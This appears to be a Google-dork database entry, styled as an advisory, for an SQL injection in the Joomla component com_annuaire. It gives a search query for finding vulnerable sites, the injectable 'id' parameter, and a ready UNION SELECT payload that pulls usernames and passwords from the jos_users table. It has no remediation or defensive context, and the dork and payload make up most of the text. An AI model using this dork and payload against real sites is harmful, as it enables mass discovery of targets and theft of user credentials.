inurl:"index.php?option=com_annuaire"

• SHDB
• 1861 阅读

• 日期：2010-12-01
• 类别：
  • Advisories and Vulnerabilities
• 作者：anonymous
• 语法：inurl:"index.php?option=com_annuaire"

• SQL Injection Vulnerability:

  [+] vuln: http://127.0.0.1/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi]

  [+] Exploit: /**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--

  Submitter: Ashiyane Digital Security Team